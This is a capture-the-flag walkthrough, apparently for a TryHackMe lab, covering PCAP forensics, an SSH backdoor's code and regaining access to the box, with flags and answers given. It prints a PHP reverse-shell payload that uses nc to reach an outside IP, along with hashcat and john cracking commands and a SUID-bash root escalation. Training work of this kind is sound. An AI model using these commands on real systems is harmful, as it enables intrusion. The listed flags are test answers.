Forensics - Analyse the PCAP

What was the url of the page they used to upload the reverse shell

Download the asset and open it using wireshark. In wireshark you can check for uploads by using http.request.method == "POST" assuming that http was used for the upload. After applying this filter you get a single entry. Right-click on the entry and click on Follow http-stream. In the first line you get the answer.

development

What payload did the attacker use to gain access?

In the same window scroll down until you find a entry that mentions a parameter name="fileToUpload". Examine this section and you can see the specific content of said file.

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

What password did the attacker use to privesc?

To complete this task you can can use the payload to follow the reverse shell. To do so set the filter to tcp.port==4242 && ip.dst=192.168.170.145 follow the first entry and you can find the password parameter including the value.

whenevernoteartinstant

How did the attacker establish persistence?

In the same window you can scroll down and you will find an entry by the user to clone the ssh-backdoor by NinjaJc01.

https://github.com/NinjaJc01/ssh-backdoor

Using the fasttrack wordlist, how many of the system passwords were crackable?

Copy the content of the "shadow"-file. Save the contents in a file and use john --wordlist /usr/share/wordlists/fasttrack.txt passwords to crack the passwords by yourself.

4

Research - Analyse the code

What's the default hash for the backdoor?

Go to https://github.com/NinjaJc01/ssh-backdoor. Select the main.go file and look for the hash variable. Copy the value and you have the answer.

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

What's the hardcoded salt for the backdoor?

Scroll through the code and you will find a function called "verify_pass". This method uses a salt-parameter. Scroll to the end of the file and you find a method called "passwordHandler" that calls "verfiy_pass" using a hard-coded value:

1c362db832f3f864c8c2fe05f2002a05

What was the hash that the attacker used? - go back to the PCAP for this!

Go back to the wireshark-window and scroll down to the bottom. At the end the attacker used "./backdoor -a" with a different hash.

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

##Crack the hash using rockyou and a cracking tool of your choice. What's the password? By looking at he source-code of we can find out that the password is salted by appending the salt. Furthermore we also get the salt. We can then combine the hash and the salt seperated by ":" in a file and store the result. By running hashid on the hash itself we can figure out that the hash is probably SHA512. We then can use hashcat to lookup the mode and use it to crack the hash by running hashcat -m 1710 hash /usr/share/wordlists/rockyou.txt --force to get the password

november16

Attack - Get back in!

The attacker defaced the website. What message did they leave as a heading?

Deploy the machine and enter the IP into a Web-Browser.

H4ck3d by CooctusClan

Using the information you've found previously, hack your way back in!

To login you have to use ssh. If you try to connect to ssh using the standard port you may have an issue. If you use nmap by running nmap -A -p IP you will find that there is also port 2222. Connect to the service using ssh james@IP -p 2222 and entering the password we got by cracking the hash in the last task (november16).

No answer needed

What's the user flag?

After establishing the ssh-connection you can get the flag by running cat ../user.txt.

thm{d119b4fa8c497ddb0525f7ad200e6567}

What's the root flag?

Move to the "/home/james"-directory and run ls -la and you will see that there is a ".suid_bash"-file by running this file by using ./.suid_bash -p to become root. After this you can run cat /root/root.txt to get the flag.

thm{d53b2684f169360bb9606c333873144d}